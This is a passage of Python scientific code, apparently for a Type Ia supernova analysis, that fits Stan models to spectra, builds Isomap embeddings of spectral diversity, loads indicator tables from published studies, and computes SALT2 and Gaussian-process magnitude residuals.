KeyError(\"Couldn't find key %s in metadata.\" % key)\n\n        if center_only:\n            use_spectra = self.spectra[self.center_mask]\n        else:\n            use_spectra = self.spectra\n\n        res = []\n        for spec in use_spectra:\n            if read_spectrum:\n                val = spec.meta[key]\n            else:\n                val = spec.target.meta[key]\n            res.append(val)\n\n        res = np.array(res)\n\n        return res\n\n    def print_verbose(self, *args, minimum_verbosity=1):\n        if self.settings['verbosity'] >= minimum_verbosity:\n            print(*args)\n\n    def model_differential_evolution(self, use_cache=True):\n        \"\"\"Estimate the spectra for each of our SNe Ia at maximum light.\n\n        This algorithm uses all targets with multiple spectra to model the differential\n        evolution of Type Ia supernovae near maximum light. This method does not rely on\n        knowing the underlying model of Type Ia supernovae and only models the\n        differences. The model is generated in magnitude space, so anything static in\n        between us and the supernova, like dust, does not affect the model.\n\n        The fit is performed using Stan. We only use Stan as a minimizer here,\n        and we do some analytic tricks inside to speed up the computation. Don't try to\n        run this in sampling mode; the analytic tricks will mess up the uncertainties\n        of a Bayesian analysis!\n\n        If use_cache is True, then the fitted model will be retrieved from a\n        cache if it exists. 
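The cache key is an MD5 hash of the dataset hash, the Stan model, and the relevant settings (the hash_info built in the body of this method), so changing any of these forces a refit. 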
Make sure to run with use_cache=False if making\n        modifications to the model!\n\n        If the 'differential_evolution_use_salt_x1' setting is True, a SALT2\n        x1-dependent term will be included in the model.\n        \"\"\"\n        # Load the stan model\n        model_path = \"./stan_models/phase_interpolation_analytic.stan\"\n        model_hash, model = utils.load_stan_model(\n            model_path,\n            verbosity=self.settings['verbosity']\n        )\n\n        # Build a hash that is unique to this dataset/analysis\n        hash_info = (\n            self.dataset_hash\n            + ';' + model_hash\n            + ';' + str(self.settings['differential_evolution_num_phase_coefficients'])\n            + ';' + str(self.settings['differential_evolution_use_salt_x1'])\n        )\n        self.differential_evolution_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n        # If we ran this model before, read the cached result if we can.\n        if use_cache:\n            cache_result = utils.load_stan_result(self.differential_evolution_hash)\n            if cache_result is not None:\n                # Found the cached result. Load it and don't redo the fit.\n                self.differential_evolution_result = cache_result\n                self.maximum_flux = cache_result[\"maximum_flux\"]\n                self.maximum_fluxerr = cache_result[\"maximum_fluxerr\"]\n                return\n\n        num_targets = len(self.targets)\n        num_spectra = len(self.flux)\n        num_wave = len(self.wave)\n        num_phase_coefficients = self.settings[\n            'differential_evolution_num_phase_coefficients'\n        ]\n\n        if num_phase_coefficients % 2 != 0:\n            raise Exception(\"ERROR: Must have an even number of phase \" \"coefficients.\")\n\n        spectra_targets = [i.target for i in self.spectra]\n        spectra_target_counts = np.array(\n            [spectra_targets.count(i.target) for i in self.spectra]\n        )\n\n        phase_coefficients = np.zeros((num_spectra, num_phase_coefficients))\n\n        for i, phase in enumerate(self.salt_phases):\n            phase_scale = np.abs(\n                (num_phase_coefficients / 2) * (phase / self.settings['phase_range'])\n            )\n\n            full_bins = int(np.floor(phase_scale))\n            remainder = phase_scale - full_bins\n\n            for j in range(full_bins + 1):\n                if j == full_bins:\n                    weight = remainder\n                else:\n                    weight = 1\n\n                if phase > 0:\n                    phase_bin = num_phase_coefficients // 2 + j\n                else:\n                    phase_bin = num_phase_coefficients // 2 - 1 - j\n\n                phase_coefficients[i, phase_bin] = weight\n\n        def stan_init():\n            init_params = {\n                \"phase_slope\": np.zeros(num_wave),\n                \"phase_quadratic\": np.zeros(num_wave),\n                \"phase_slope_x1\": np.zeros(num_wave),\n                \"phase_quadratic_x1\": np.zeros(num_wave),\n                \"phase_dispersion_coefficients\": (\n                    0.01 * np.ones((num_phase_coefficients, num_wave))\n                ),\n                \"gray_offsets\": np.zeros(num_spectra),\n                \"gray_dispersion_scale\": 0.02,\n            }\n\n            return init_params\n\n        if self.settings['differential_evolution_use_salt_x1']:\n            x1 = self.salt_x1\n        else:\n            x1 = np.zeros(num_targets)\n\n        stan_data = {\n            \"num_targets\": num_targets,\n            \"num_spectra\": num_spectra,\n            \"num_wave\": num_wave,\n            \"measured_flux\": self.flux,\n            \"measured_fluxerr\": self.fluxerr,\n            \"phases\": [i.phase for i in self.spectra],\n            \"phase_coefficients\": phase_coefficients,\n            \"num_phase_coefficients\": num_phase_coefficients,\n            \"spectra_target_counts\": spectra_target_counts,\n            \"target_map\": self.target_map + 1,  # stan uses 1-based indexing\n            \"maximum_map\": np.where(self.center_mask)[0] + 1,\n            \"salt_x1\": x1,\n        }\n\n        sys.stdout.flush()\n        result = model.optimizing(\n            data=stan_data, init=stan_init, verbose=True, iter=20000, history_size=100\n        )\n\n        self.differential_evolution_result = result\n        self.maximum_flux = result[\"maximum_flux\"]\n        self.maximum_fluxerr = result[\"maximum_fluxerr\"]\n\n        # Save the output to cache it for future runs.\n        
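# (The use_cache branch at the top of this method restores exactly this result\n        # dict, reading back its 'maximum_flux' and 'maximum_fluxerr' entries.)\n        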
utils.save_stan_result(self.differential_evolution_hash, result)\n\n def read_between_the_lines(self, use_cache=True):\n \"\"\"Run the read between the lines algorithm.\n\n This algorithm estimates the brightnesses and colors of every spectrum\n and produces dereddened spectra.\n\n The fit is performed using Stan. We only use Stan as a minimizer here.\n \"\"\"\n # Load the fiducial color law.\n self.rbtl_color_law = extinction.fitzpatrick99(\n self.wave, 1.0, self.settings['rbtl_fiducial_rv']\n )\n\n # Load the stan model\n model_path = \"./stan_models/read_between_the_lines.stan\"\n model_hash, model = utils.load_stan_model(\n model_path,\n verbosity=self.settings['verbosity']\n )\n\n # Build a hash that is unique to this dataset/analysis\n hash_info = (\n self.differential_evolution_hash\n + ';' + model_hash\n + ';' + str(self.settings['rbtl_fiducial_rv'])\n )\n if self.settings['test_no_interpolation']:\n hash_info += ';no_interpolation'\n self.rbtl_hash = md5(hash_info.encode(\"ascii\")).hexdigest()\n\n # If we ran this model before, read the cached result if we can.\n if use_cache:\n cache_result = utils.load_stan_result(self.rbtl_hash)\n if cache_result is not None:\n # Found the cached result. Load it and don't redo the fit.\n self._parse_rbtl_result(cache_result)\n return\n\n use_targets = self.targets\n\n num_targets = len(use_targets)\n num_wave = len(self.wave)\n\n def stan_init():\n # Use the spectrum closest to maximum as a first guess of the\n # target's spectrum.\n start_mean_flux = np.mean(self.maximum_flux, axis=0)\n start_fractional_dispersion = 0.1 * np.ones(num_wave)\n\n return {\n \"mean_flux\": start_mean_flux,\n \"fractional_dispersion\": start_fractional_dispersion,\n \"colors_raw\": np.zeros(num_targets - 1),\n \"magnitudes_raw\": np.zeros(num_targets - 1),\n }\n\n stan_data = {\n \"num_targets\": num_targets,\n \"num_wave\": num_wave,\n \"maximum_flux\": self.maximum_flux,\n \"maximum_fluxerr\": self.maximum_fluxerr,\n \"color_law\": self.rbtl_color_law,\n }\n\n sys.stdout.flush()\n result = model.optimizing(data=stan_data, init=stan_init, verbose=True,\n iter=5000)\n\n # Save the output to cache it for future runs.\n utils.save_stan_result(self.rbtl_hash, result)\n\n # Parse the result\n self._parse_rbtl_result(result)\n\n def _calculate_rbtl_uncertainties(self):\n mag_errs = []\n color_errs = []\n\n for idx in range(len(self.maximum_flux)):\n def nll(vals):\n dm, dc = vals\n max_flux = self.maximum_flux[idx]\n model_flux = (\n self.rbtl_result['mean_flux'] * 10**(-0.4 * (\n (self.rbtl_result['colors'][idx] + dc) * self.rbtl_color_law\n + self.rbtl_result['magnitudes'][idx] + dm\n ))\n )\n fluxerr = np.sqrt(\n (self.rbtl_result['fractional_dispersion'] * model_flux)**2\n + (self.maximum_fluxerr[idx]**2)\n )\n\n nll = 0.5 * np.sum((max_flux - model_flux)**2 / fluxerr**2)\n\n return nll\n\n cov = math.calculate_covariance_finite_difference(\n nll, ['dm', 'dc'], [0., 0.], [(None, None), (None, None)]\n )\n mag_err, color_err = np.sqrt(np.diag(cov))\n mag_errs.append(mag_err)\n color_errs.append(color_err)\n\n mag_errs = np.array(mag_errs)\n color_errs = np.array(color_errs)\n\n return mag_errs, color_errs\n\n def _parse_rbtl_result(self, result):\n \"\"\"Parse and save the result of a run of the RBTL analysis\"\"\"\n self.rbtl_result = result\n\n self.rbtl_colors = result[\"colors\"] - np.median(result['colors'])\n self.rbtl_mags = result[\"magnitudes\"] - np.median(result['magnitudes'])\n self.mean_flux = result[\"mean_flux\"]\n\n if self.settings['blinded']:\n # 
Immediately discard validation magnitudes so that we can't\n            # accidentally look at them.\n            self.rbtl_mags[~self.train_mask] = np.nan\n\n        # Deredden the real spectra and set them to the same scale as the mean\n        # spectrum.\n        self.scale_flux = self.maximum_flux / result['model_scales']\n        self.scale_fluxerr = self.maximum_fluxerr / result['model_scales']\n\n        # Calculate fractional differences from the mean spectrum.\n        self.fractional_differences = self.scale_flux / self.mean_flux - 1\n        self.fractional_difference_uncertainties = self.scale_fluxerr / self.mean_flux\n\n    def build_masks(self):\n        \"\"\"Build masks that are used in the various manifold learning and magnitude\n        analyses\n        \"\"\"\n        # For the manifold learning analysis, we need to make sure that the estimated\n        # spectra at maximum light have reasonable uncertainties.\n        # We define \"reasonable\" by comparing the variance of each spectrum to the\n        # size of the intrinsic supernova variation measured in the RBTL analysis.\n        intrinsic_dispersion = utils.frac_to_mag(\n            self.rbtl_result[\"fractional_dispersion\"]\n        )\n        intrinsic_power = np.sum(intrinsic_dispersion**2)\n        maximum_uncertainty = utils.frac_to_mag(\n            self.maximum_fluxerr / self.maximum_flux\n        )\n        maximum_power = np.sum(maximum_uncertainty**2, axis=1)\n        self.maximum_uncertainty_fraction = maximum_power / intrinsic_power\n        self.uncertainty_mask = (\n            self.maximum_uncertainty_fraction <\n            self.settings['mask_uncertainty_fraction']\n        )\n        self.print_verbose(\n            \"    Masking %d/%d targets whose uncertainty power is \\n\"\n            \"    more than %.3f of the intrinsic power.\"\n            % (np.sum(~self.uncertainty_mask), len(self.uncertainty_mask),\n               self.settings['mask_uncertainty_fraction'])\n        )\n\n        # Mask to select targets whose magnitude is not expected to have a large\n        # dispersion in brightness (well-measured redshifts in the Hubble flow, and\n        # not overly red colors).\n        with np.errstate(invalid=\"ignore\"):\n            self.redshift_color_mask = (\n                (self.redshift_errs < 0.004)\n                & (self.helio_redshifts > 0.02)\n                & (self.rbtl_colors < 0.5)\n            )\n\n    def generate_embedding(self, num_neighbors=None, num_components=-1, mask=None,\n                           model=None, data=None):\n        \"\"\"Generate a manifold learning embedding.\n\n        By default we use Isomap with hyperparameters as set in the settings, but\n        this can be overridden by manually specifying the hyperparameters or any\n        model that follows the sklearn API.\n        \"\"\"\n        if model is None:\n            if num_neighbors is None:\n                num_neighbors = self.settings['isomap_num_neighbors']\n\n            if num_components == -1:\n                num_components = self.settings['isomap_num_components']\n\n            model = Isomap(n_neighbors=num_neighbors, n_components=num_components)\n\n        if mask is None:\n            good_mask = self.uncertainty_mask\n        else:\n            good_mask = mask\n\n        if data is None:\n            data = self.fractional_differences\n\n        # Build the embedding using well-measured targets\n        ref_embedding = model.fit_transform(data[good_mask])\n\n        # Evaluate the coordinates in the embedding for the remaining targets.\n        if not np.all(good_mask):\n            other_embedding = model.transform(data[~good_mask])\n\n        # Combine everything into a single array.\n        embedding = np.zeros((len(self.targets), ref_embedding.shape[1]))\n        embedding[good_mask] = ref_embedding\n\n        if not np.all(good_mask):\n            embedding[~good_mask] = other_embedding\n\n        # The signs of the embedding are arbitrary... 
flip the sign of some of them to\n # make them match up with well-known indicators in the literature.\n for component in self.settings['isomap_flip_components']:\n if num_components > component:\n embedding[:, component] *= -1\n\n return embedding\n\n def load_indicators(self):\n \"\"\"Calculate/load a range of different indicators of intrinsic diversity\"\"\"\n all_indicators = []\n\n # Dummy table with the target name\n target_table = table.Table({'name': [i.name for i in self.targets]},\n masked=True)\n all_indicators.append(target_table)\n\n # Add in all of the different indicators that are available.\n all_indicators.append(self.load_isomap_indicators())\n all_indicators.append(self.load_salt_indicators())\n all_indicators.append(self.calculate_spectral_indicators())\n all_indicators.append(self.load_nordin_colors())\n all_indicators.append(self.load_sugar_components())\n all_indicators.append(self.load_snemo_components())\n all_indicators.append(self.load_host_data())\n all_indicators.append(self.load_peculiar_data())\n\n all_indicators = table.hstack(all_indicators)\n\n self.indicators = all_indicators\n\n # Extract masks that we will use extensively.\n self.peculiar_mask = (self.indicators['peculiar_type'] == 'Normal').filled()\n self.host_mask = ~self.indicators['host_lssfr'].mask\n\n def load_isomap_indicators(self):\n \"\"\"Extract Isomap indicators\"\"\"\n columns = []\n for i in range(self.settings['isomap_num_components']):\n columns.append(table.MaskedColumn(\n self.embedding[:, i],\n name=f'isomap_c{i+1}',\n mask=~self.uncertainty_mask,\n ))\n\n return table.Table(columns)\n\n def load_salt_indicators(self):\n \"\"\"Extract SALT2.4 indicators from the fits\"\"\"\n salt_indicators = table.Table(self.salt_fits[['c', 'x1']], masked=True)\n salt_indicators['c'].name = 'salt_c'\n salt_indicators['x1'].name = 'salt_x1'\n salt_indicators['salt_c'].mask = ~self.salt_mask\n salt_indicators['salt_x1'].mask = ~self.salt_mask\n\n return salt_indicators\n\n def calculate_spectral_indicators(self):\n \"\"\"Calculate spectral indicators for all of the features\"\"\"\n spectral_indicators = []\n\n for idx in range(len(self.scale_flux)):\n spec = specind.Spectrum(\n self.wave, self.scale_flux[idx], self.scale_fluxerr[idx]**2\n )\n indicators = spec.get_spin_dict()\n spectral_indicators.append(indicators)\n\n spectral_indicators = table.Table(spectral_indicators, masked=True)\n\n # Figure out Branch classifications\n all_si6355 = spectral_indicators[\"EWSiII6355\"]\n all_si5972 = spectral_indicators[\"EWSiII5972\"]\n\n branch_classifications = []\n\n for si6355, si5972 in zip(all_si6355, all_si5972):\n if si5972 >= 30:\n branch_classifications.append(\"Cool\")\n elif (si5972 < 30) & (si6355 < 70):\n branch_classifications.append(\"Shallow Silicon\")\n elif (si5972 < 30) & (si6355 >= 70) & (si6355 < 100):\n branch_classifications.append(\"Core Normal\")\n elif (si5972 < 30) & (si6355 >= 100):\n branch_classifications.append(\"Broad Line\")\n\n spectral_indicators['branch_classification'] = branch_classifications\n\n for colname in spectral_indicators.colnames:\n # Mask out indicators that we shouldn't be using.\n spectral_indicators[colname].mask = ~self.uncertainty_mask\n\n if 'branch' not in colname:\n spectral_indicators.rename_column(colname, f'spectrum_{colname}')\n\n return spectral_indicators\n\n def _load_table(self, path, name_key):\n \"\"\"Read a table from a given path and match it to our list of targets\"\"\"\n # Read the table\n data = table.Table.read(path)\n\n # Make a dummy 
table with the names of each of our SNe Ia\n        name_table = table.Table({name_key: [i.name for i in self.targets]})\n\n        # Join the tables\n        ordered_table = table.join(name_table, data, join_type='left')\n\n        return ordered_table\n\n    def load_sugar_components(self):\n        \"\"\"Load the SUGAR components from Leget et al. 2019\"\"\"\n        pickle_data = open('./data/sugar_parameters.pkl').read() \\\n            .replace('\\r\\n', '\\n').encode('latin1')\n        sugar_data = pickle.loads(pickle_data, encoding='latin1')\n\n        sugar_keys = ['q1', 'q2', 'q3', 'Av', 'grey']\n\n        sugar_rows = []\n        for target in self.targets:\n            try:\n                row = sugar_data[target.name.encode('latin1')]\n                sugar_rows.append([row[i] for i in sugar_keys])\n            except KeyError:\n                sugar_rows.append(np.ma.masked_array([np.nan]*len(sugar_keys),\n                                                     [1]*len(sugar_keys)))\n\n        sugar_components = table.Table(\n            rows=sugar_rows,\n            names=[f'sugar_{i}' for i in sugar_keys],\n        )\n\n        return sugar_components\n\n    def load_nordin_colors(self):\n        \"\"\"Load the U-band colors from Nordin et al. 2018\"\"\"\n        nordin_table = self._load_table('./data/nordin_2018_colors.csv', 'name')\n\n        for colname in nordin_table.colnames:\n            nordin_table.rename_column(colname, f'nordin_{colname}')\n\n        return nordin_table\n\n    def load_snemo_components(self):\n        \"\"\"Load the SNEMO components from Saunders et al. 2018\"\"\"\n        snemo_table = self._load_table('./data/snemo_salt_coefficients_snf.csv', 'SN')\n\n        for colname in snemo_table.colnames:\n            if 'snemo' not in colname:\n                snemo_table.rename_column(colname, f'snemo_{colname}')\n                continue\n\n        return snemo_table\n\n    def load_host_data(self):\n        \"\"\"Load host data from Rigault et al. 2019\"\"\"\n        host_data = self._load_table('./data/host_properties_rigault_valid.csv', 'name')\n\n        # Note: This list is from private communication and has the same names as our\n        # dataset. The data table in Rigault et al. 2019 uses IAU names which can be\n        # converted using self.iau_name_map.get(name, name)\n        for original_colname in host_data.colnames:\n            colname = original_colname\n\n            if 'host' not in colname:\n                colname = f'host_{colname}'\n\n            colname = colname.replace('.', '_')\n\n            host_data.rename_column(original_colname, colname)\n\n        return host_data\n\n    def load_peculiar_data(self):\n        \"\"\"Load peculiar SNe Ia information from Lin et al. 2020\"\"\"\n        raw_peculiar_data = self._load_table('./data/peculiar_lin_2020.csv', 'name')\n\n        peculiar_type = raw_peculiar_data['kind'].filled('Normal')\n        peculiar_reference = raw_peculiar_data['reference'].filled('')\n\n        peculiar_table = table.Table({\n            'peculiar_type': peculiar_type,\n            'peculiar_reference': peculiar_reference,\n        }, masked=True)\n\n        return peculiar_table\n\n    def find_best_transformation(self, target_indicator,\n                                 quadratic_reference_indicators=[],\n                                 linear_reference_indicators=[], mask=True,\n                                 shuffle=False):\n        \"\"\"Find the best transformation of a set of indicators to reproduce a different\n        indicator.\n\n        The indicators can be either keys corresponding to columns in the\n        self.indicators table or arrays of values directly. Masks will automatically be\n        extracted if the indicators are `MaskedColumn` or `numpy.ma.masked_array`\n        instances. 
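For example, `find_best_transformation('salt_x1', linear_reference_indicators=['isomap_c1'])` would regress the SALT2 x1 column of the indicators table onto the first Isomap component (an illustrative call; any indicator columns or raw arrays can be used). 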
A mask can also be explicitly passed to this function which will be\n        used in addition to any extracted masks.\n\n        Parameters\n        ----------\n        target_indicator : str or array\n            The indicator to attempt to reproduce.\n        quadratic_reference_indicators : list of strs or arrays, optional\n            Indicators to transform, with up to quadratic terms (including cross-terms)\n            allowed in each of these indicators.\n        linear_reference_indicators : list of strs or arrays, optional\n            Indicators to transform, with only linear terms allowed in each of these\n            indicators.\n        mask : array of bools, optional\n            A mask to apply (in addition to ones extracted from the indicators).\n        shuffle : bool, optional\n            If True, shuffle the reference indicators randomly before doing the\n            transformation. This can be used to determine the significance of any\n            relations. (default False)\n\n        Returns\n        -------\n        explained_variance : float\n            Fraction of variance that is explained by the transformation.\n        coefficients : array\n            Coefficients of the transformation.\n        best_transformation : array\n            Transformation of the reference values that best matches the target values.\n        mask : array\n            Mask that was used for the transformation.\n        \"\"\"\n        def parse_column(col):\n            if isinstance(col, str):\n                return self.indicators[col]\n            else:\n                return col\n\n        quad_ref_columns = [parse_column(i) for i in quadratic_reference_indicators]\n        lin_ref_columns = [parse_column(i) for i in linear_reference_indicators]\n        target_column = parse_column(target_indicator)\n\n        # Build the mask taking masked columns into account if applicable.\n        for column in quad_ref_columns + lin_ref_columns + [target_column]:\n            try:\n                mask = mask & ~column.mask\n            except AttributeError:\n                continue\n\n        # Get basic numpy arrays for everything and apply the masks. This has a\n        # surprisingly large effect on performance.\n        quad_ref_values = [np.asarray(i)[mask] for i in quad_ref_columns]\n        lin_ref_values = [np.asarray(i)[mask] for i in lin_ref_columns]\n        target_values = np.asarray(target_column)[mask]\n\n        if shuffle:\n            # Reorder the references randomly\n            order = np.random.permutation(np.arange(len(target_values)))\n            quad_ref_values = [i[order] for i in quad_ref_values]\n            lin_ref_values = [i[order] for i in lin_ref_values]\n\n        num_linear_terms = len(quad_ref_values) + len(lin_ref_values)\n        num_quadratic_terms = (len(quad_ref_values) + 1) * len(quad_ref_values) // 2\n\n        num_terms = 1 + num_linear_terms + num_quadratic_terms\n\n        def evaluate(x):\n            zeropoint = x[0]\n            linear_coeffs = x[1:num_linear_terms+1]\n            quadratic_coeffs = x[num_linear_terms+1:]\n\n            # Start the model with the zeropoint\n            model = zeropoint\n\n            # Linear terms. Note that the quadratic terms also have a linear one.\n            lin_idx = 0\n            for val in lin_ref_values:\n                model += linear_coeffs[lin_idx] * val\n                lin_idx += 1\n            for val in quad_ref_values:\n                model += linear_coeffs[lin_idx] * val\n                lin_idx += 1\n\n            # Quadratic terms.\n            quad_idx = 0\n            for i, val1 in enumerate(quad_ref_values):\n                for j, val2 in enumerate(quad_ref_values):\n                    if i > j:\n                        continue\n                    model += quadratic_coeffs[quad_idx] * val1 * val2\n                    quad_idx += 1\n\n            return model\n\n        norm = 1. 
/ len(target_values) / np.var(target_values)\n\n def calc_unexplained_variance(x):\n model = evaluate(x)\n diff = target_values - model\n return np.sum(diff**2) * norm\n\n res = minimize(calc_unexplained_variance, [0] * num_terms)\n best_guess = utils.fill_mask(evaluate(res.x), mask)\n explained_variance = 1 - calc_unexplained_variance(res.x)\n\n return explained_variance, res.x, best_guess, mask\n\n def calculate_peculiar_velocity_uncertainties(self, redshifts):\n \"\"\"Calculate dispersion added to the magnitude due to host galaxy\n peculiar velocity\n \"\"\"\n pec_vel_dispersion = (5 / np.log(10)) * (\n self.settings['peculiar_velocity'] / 3e5 / redshifts\n )\n\n return pec_vel_dispersion\n\n def _get_gp_data(self, kind=\"rbtl\"):\n \"\"\"Return the data needed for GP fits along with the corresponding masks.\n\n Parameters\n ----------\n kind : {'rbtl', 'salt', 'salt_raw'}\n The kind of magnitude data to return. The options are:\n - rbtl: RBTL magnitudes and colors.\n - salt: Corrected SALT2 magnitudes and colors.\n - salt_raw: Uncorrected SALT2 magnitudes and colors.\n\n Returns\n -------\n coordinates : numpy.array\n The coordinates to evaluate the GP over.\n mags : numpy.array\n A list of magnitudes for each supernova in the sample.\n mag_errs : numpy.array\n The uncertainties on the magnitudes. This only includes measurement\n uncertainties, not model ones (since the GP will handle that). Since we are\n dealing with high signal-to-noise light curves/spectra, the color and\n magnitude measurement errors are very small and difficult to propagate so I\n ignore them. This therefore only includes contributions from peculiar\n velocity.\n colors : numpy.array\n A list of colors for each supernova in the sample.\n condition_mask : numpy.array\n The mask that should be used for conditioning the GP.\n \"\"\"\n if kind == \"rbtl\":\n mags = self.rbtl_mags\n colors = self.rbtl_colors\n condition_mask = self.uncertainty_mask & self.redshift_color_mask\n\n # Assume that we can ignore measurement uncertainties for the magnitude\n # errors, so the only contribution is from peculiar velocities.\n mag_errs = self.calculate_peculiar_velocity_uncertainties(self.redshifts)\n elif kind == \"salt_raw\" or kind == \"salt\":\n if kind == \"salt_raw\":\n # Evaluate the residuals with all model terms set to zero.\n mags, mag_errs = self._evaluate_salt_magnitude_residuals(\n [], 0., 0., 0., 0.\n )\n elif kind == \"salt\":\n # Use the standard SALT2 fit as a baseline.\n mags = self.residuals_salt['residuals']\n mag_errs = self.residuals_salt['raw_residual_uncertainties']\n\n colors = self.salt_colors\n condition_mask = (\n self.salt_mask\n & self.uncertainty_mask\n & self.redshift_color_mask\n )\n else:\n raise TwinsEmbeddingException(\"Unknown kind %s!\" % kind)\n\n # Use the Isomap embedding for the GP coordinates.\n coordinates = self.embedding\n\n # If the analysis is blinded, only use the training data for conditioning.\n if self.settings['blinded']:\n condition_mask &= self.train_mask\n\n return coordinates, mags, mag_errs, colors, condition_mask\n\n def fit_gp_magnitude_residuals(self, kind=\"rbtl\", mask=None,\n additional_covariates=[], verbosity=None):\n \"\"\"Calculate magnitude residuals using a GP over a given latent space.\"\"\"\n if verbosity is None:\n verbosity = self.settings['verbosity']\n\n # Fit the hyperparameters on the full conditioning sample.\n coordinates, mags, mag_errs, colors, raw_mask = self._get_gp_data(kind)\n\n # Build a list of linear covariates to use in the model that 
includes the color\n # and any user-specified covariates.\n covariates = [\n colors,\n ]\n\n if additional_covariates:\n covariates.append(additional_covariates)\n\n covariates = np.vstack(covariates)\n\n # Apply the user-specified mask if one was given.\n if mask is None:\n mask = raw_mask\n else:\n mask = mask & raw_mask\n\n manifold_gp = ManifoldGaussianProcess(\n self,\n self.embedding,\n mags,\n mag_errs,\n covariates,\n mask,\n )\n\n manifold_gp.fit(verbosity=verbosity)\n\n return manifold_gp\n\n def _evaluate_salt_magnitude_residuals(self, additional_covariates,\n intrinsic_dispersion, ref_mag, alpha, beta,\n *covariate_slopes):\n \"\"\"Evaluate SALT2 magnitude residuals for a given set of standardization\n parameters\n\n Parameters\n ----------\n additional_covariates : list of arrays\n Additional covariates to use in the fits (e.g. host properties). This should\n be a list of arrays, each of which has the same length as the number of\n SNe Ia in the dataset.\n intrinsic_dispersion : float\n Assumed intrinsic dispersion of the sample.\n ref_mag : float\n The intrinsic B-band brightness of Type Ia supernovae\n alpha : float\n Standardization coefficient for the SALT2 x1 parameter\n beta : float\n Standardization coefficient for the SALT2 color parameter\n covariate_slopes : list\n Slopes for each of the additional covariates.\n\n Returns\n -------\n residuals : numpy.array\n The SALT2 magnitude residuals for every target in the dataset\n residual_uncertainties : numpy.array\n The associated uncertainties on the SALT2 magnitude residuals.\n \"\"\"\n salt_fits = self.salt_fits\n\n mb = -2.5*np.log10(salt_fits['x0'].data)\n x0_err = salt_fits['x0_err'].data\n mb_err = utils.frac_to_mag(x0_err / salt_fits['x0'].data)\n x1_err = salt_fits['x1_err'].data\n color_err = salt_fits['c_err'].data\n\n cov_mb_x1 = salt_fits['covariance'].data[:, 1, 2] * -mb_err / x0_err\n cov_color_mb = salt_fits['covariance'].data[:, 1, 3] * -mb_err / x0_err\n cov_color_x1 = salt_fits['covariance'].data[:, 2, 3]\n\n peculiar_velocity_uncertainties = \\\n self.calculate_peculiar_velocity_uncertainties(self.redshifts)\n\n model = (\n ref_mag\n - alpha * salt_fits['x1'].data\n + beta * salt_fits['c'].data\n )\n\n for slope, covariate in zip(covariate_slopes, additional_covariates):\n model += slope * covariate\n\n residual_uncertainties = np.sqrt(\n intrinsic_dispersion**2\n + peculiar_velocity_uncertainties**2\n + mb_err**2\n + alpha**2 * x1_err**2\n + beta**2 * color_err**2\n + 2 * alpha * cov_mb_x1\n - 2 * beta * cov_color_mb\n - 2 * alpha * beta * cov_color_x1\n )\n\n residuals = mb - model\n\n return residuals, residual_uncertainties\n\n def fit_salt_magnitude_residuals(self, mask=None, additional_covariates=[],\n bootstrap=False, verbosity=None):\n \"\"\"Calculate SALT2 magnitude residuals\n\n This follows the standard procedure of estimating the alpha and beta correction\n parameters using an assumed intrinsic dispersion, then solving for the intrinsic\n dispersion that sets the chi-square to 1. We repeat this procedure until the\n intrinsic dispersion converges.\n \"\"\"\n if verbosity is None:\n verbosity = self.settings['verbosity']\n\n # Start with a complete mask if there wasn't a user specified one.\n if mask is None:\n mask = np.ones(len(self.salt_fits), dtype=bool)\n else:\n mask = mask.copy()\n\n # Reject bad SALT2 fits.\n mask &= self.salt_mask\n\n # Apply the Twins Manifold mask. 
This ensures that we are comparing to the same\n # sample.\n mask &= self.uncertainty_mask\n\n # Require reasonable redshifts and colors for the determination of\n # standardization parameters. The redshift_color_mask produced by the\n # read_between_the_lines algorithm does this.\n mask &= self.redshift_color_mask\n\n if bootstrap:\n # Do a bootstrap resampling of the dataset. We can use this to estimate\n # uncertainties on all of our parameters.\n mask = np.random.choice(np.where(mask)[0], np.sum(mask))\n\n # Starting value for intrinsic dispersion. We will update this in each\n # round to set chi2 = 1\n intrinsic_dispersion = 0.1\n\n for i in range(10):\n def calc_dispersion(*fit_parameters):\n residuals, residual_uncertainties = \\\n self._evaluate_salt_magnitude_residuals(additional_covariates,\n *fit_parameters)\n\n mask_residuals = residuals[mask]\n mask_residual_uncertainties = residual_uncertainties[mask]\n\n weights = 1 / mask_residual_uncertainties**2\n\n dispersion = np.sqrt(\n np.sum(weights * mask_residuals**2)\n / np.sum(weights)\n )\n\n return dispersion\n\n def to_min_fit_parameters(x):\n return calc_dispersion(intrinsic_dispersion, *x)\n\n start_vals = [-10, 0.13, 3.0] + [0.] * len(additional_covariates)\n\n res = minimize(to_min_fit_parameters, start_vals)\n fit_parameters = res.x\n\n if verbosity >= 2:\n print(f\"Pass {i}, ref_mag={fit_parameters[0]:.3f}, \"\n f\"alpha={fit_parameters[1]:.3f}, \"\n f\"beta={fit_parameters[2]:.3f}\")\n\n # Reestimate intrinsic dispersion.\n def chisq(intrinsic_dispersion):\n residuals, residual_uncertainties = \\\n self._evaluate_salt_magnitude_residuals(\n additional_covariates, intrinsic_dispersion, *res.x\n )\n\n mask_residuals = residuals[mask]\n mask_residual_uncertainties = residual_uncertainties[mask]\n\n dof = 4 + len(additional_covariates)\n\n return np.sum(\n mask_residuals**2 / mask_residual_uncertainties**2\n ) / (len(mask_residuals) - dof)\n\n def to_min_intrinsic_dispersion(x):\n chi2 = chisq(x[0])\n return (chi2 - 1)**2\n\n res_int_disp = minimize(\n to_min_intrinsic_dispersion,\n [intrinsic_dispersion],\n bounds=[(0, None)],\n )\n\n old_intrinsic_dispersion = intrinsic_dispersion\n intrinsic_dispersion = res_int_disp.x[0]\n\n if verbosity >= 2:\n print(\" -> new intrinsic_dispersion=%.3f\" % intrinsic_dispersion)\n\n if np.abs(intrinsic_dispersion - old_intrinsic_dispersion) < 1e-5:\n break\n else:\n raise Exception(\"Intrinsic dispersion didn't converge!\")\n\n # Calculate the SALT2 magnitude residuals.\n residuals, residual_uncertainties = self._evaluate_salt_magnitude_residuals(\n additional_covariates, intrinsic_dispersion, *fit_parameters\n )\n\n # Calculate SALT2 uncertainties without the intrinsic dispersion component.\n raw_uncertainties = np.sqrt(\n residual_uncertainties**2 - intrinsic_dispersion**2\n )\n\n result = {\n 'mask': mask,\n 'ref_mag': res.x[0],\n 'alpha': res.x[1],\n 'beta': res.x[2],\n 'intrinsic_dispersion': intrinsic_dispersion,\n 'wrms': res.fun,\n 'rms': np.std(residuals[mask]),\n 'nmad': math.nmad(residuals[mask]),\n 'residuals': residuals,\n 'residual_uncertainties': residual_uncertainties,\n 'raw_residual_uncertainties': raw_uncertainties,\n }\n\n if verbosity >= 1:\n print(\"SALT2 magnitude residuals fit: \")\n # print(f\" ref_mag: 